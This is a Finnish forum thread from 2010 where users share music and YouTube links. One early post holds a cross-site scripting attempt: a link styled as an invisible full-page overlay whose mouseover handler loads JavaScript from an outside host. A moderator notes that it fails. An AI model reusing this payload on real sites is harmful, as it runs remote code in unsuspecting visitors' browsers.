Kirjautuminen

Haku

Tehtävät

Keskustelu: Yleinen keskustelu: :)

Sivun loppuun

pistemies [29.10.2010 15:56:49]

#

http://www.youtube.com/watch?v=gn0QtbbUPHg

Lumpio- [29.10.2010 16:19:37]

#

Mutta miksi?

[linkki "#" style="display:block;position:fixed;top:0;left:0;width:2000px;height:2000px" onmouseover="s=document.createElement('script');s.src='http://lumpio.dy.fi/b/touhous.js/';document.body.appendChild(s);"]8)[/linkki]

Mod. huom: Hakkerointi ei toimi... ;)

Jokotai [29.10.2010 16:28:30]

#

Miksipäs ei :)

pistemies [29.10.2010 17:56:06]

#

Vähän väriä (?) elämää, kun täällä selailee....

pistemies [29.10.2010 17:59:58]

#

Suunnilleen Kirkan paras kappale :)

pistemies [30.10.2010 13:19:00]

#

No juu, on tääkin aika hyvä

http://www.youtube.com/watch?v=S3pK-uYuDSU

Macro [30.10.2010 13:33:40]

#

Muitakin hyviä kappaleita muilta yhtyeiltä ovat esimerkiksi Foreignerin Luanne aj Irene Caran What A Feeling.

http://www.youtube.com/watch?v=Sc4wUsgxrhI
http://www.youtube.com/watch?v=GRSCFUtbpqM

Blaze [30.10.2010 17:46:59]

#

Tää on nyt virallisesti "postaa hyvää musaa" -lanka.

妖精帝國 - Wahrheit
Eternal Tears of Sorrow - Red Dawn Rising
Therion - The Wand of Abaris

Jokotai [31.10.2010 10:20:47]

#

Vaikkei vielä olekaan Miku maanantai.

White Letter / Hatsune Miku
Hatsune Miku - Innocence
Miku-Mikku Miku ni Shite Ageru

pistemies [31.10.2010 20:23:38]

#

Kivaa musaa, vaikuttava oli minusta varsinkin tuo What A Feeling. Video tosin heikko, mutta äänentoisto mahtava :)

Kirka-fani tarjoaa >>
Kirka - Don't Steal My Heart:
http://www.youtube.com/watch?v=mVBTEQMWOII

Latska [01.11.2010 10:22:47]

#

Vai että "postaa hyvää musaa" -lanka. Musiikki onkin ainoa asia, josta pystyn puhumaan kaikkien kanssa. Biisien hyvyydestä voidaan tosin olla monta mieltä.

Blondie - Rapture
Absoluuttinen Nollapiste - Rarmos Ybrehtar
Focus - Hocus Pocus
Vesa-Matti Loiri - Miksi naiset aina rakastuvat renttuihin
Tony Halme - Isätön poika

Ja kyllä, olen myös sitä mieltä, että Kirkan hevilevyt on melkein kovinta ikinä. Jos miehen ääni vaan olis kestäny, niillä lahjoilla olis saatu koska vaan kansainvälistä mainetta.

Gwaur [01.11.2010 12:53:55]

#

Vai että "postaa hyvää musaa" -lanka.

Eugene Krylatov–Chizhik-jazz-quartet: About Love
The Seatbelts: Tank!
Nirvana–Paul Anka: Smells like Teen Spirit
Joe Hisaishi: The Legend of Ashitaka
Sergei Rahmaninov: Pianokonsertto nro 2

Teuro [01.11.2010 13:24:29]

#

Joo tässäpä näitä

Hurra torpedo Total eclipse of teh heart
rumpali

Macro [01.11.2010 16:13:16]

#

Macro kirjoitti:

... aj ...

Mitenköhän onnistuu kirjoittamaan ja-sanan väärin..?

Foreigner - Night Life
Foreigner - Jukebox Hero
... ja muut Foreignerin biisit.

hunajavohveli [01.11.2010 18:18:42]

#

tejeez - kukkakaali (kuva ei liity, vaihtoehtoisesti hallusinogeenien kera)

Enempää tejeeziä ei löytynyt. :-(

Jokotai [01.11.2010 19:16:40]

#

Toi hallusinogeeni päris :)

Blaze [01.11.2010 20:04:54]

#

hunajavohveli kirjoitti:

tejeez - kukkakaali

No kun tälle linjalle lähdettiin, niin en voi olla linkkaamatta omaa tejeez-suosikkiani, toimitusjohtajaa :P

Torgo [01.11.2010 21:05:44]

#

Jos tämä olisi julistettu virallisesti "tribuutti edesmenneille solistisuuruuksille" -langaksi, niin olisin Kirkan jatkoksi heittänyt seuraavan listan:

Johnny Cash - Hurt
Doors - L.A. Woman
Rainbow - Stargazer
Queen - I Want It All

Mutta koska tämä on virallisesti "postaa hyvää musaa" -lanka, niin annetaan edes jotain kunniaa vielä elossa olevillekin:

Dream Theater - Another World
Bruce Dickinson - Tears Of The Dragon

Loppuun vielä se pakollinen loppukevennys. :D

Jokotai [03.11.2010 19:49:35]

#

Ompas ne nirsoja. Blazen wahrheit linkki on poistettu :(
Mutta etsimpä uuden linkin, niin kuin kukaan ei muka osaisi itsekin :D

pistemies [07.11.2010 13:09:40]

#

Tämä oli aika jännä :)

http://www.youtube.com/watch?v=NDcGzTGycK8

Ps. Hyvyydestä en tiedä oikein sanoa :)

Jokotai [17.11.2010 17:13:57]

#

http://www.youtube.com/watch?v=xZkZWevMtiI­&feature=player_embedded#!

Touhout on aina hyviä.

tsuriga [17.11.2010 20:46:12]

#

Touhou PV - Danzai Yamaxanadu! [IOSYS]


Sivun alkuun

Vastaus

Aihe on jo aika vanha, joten et voi enää vastata siihen.

Tietoa sivustosta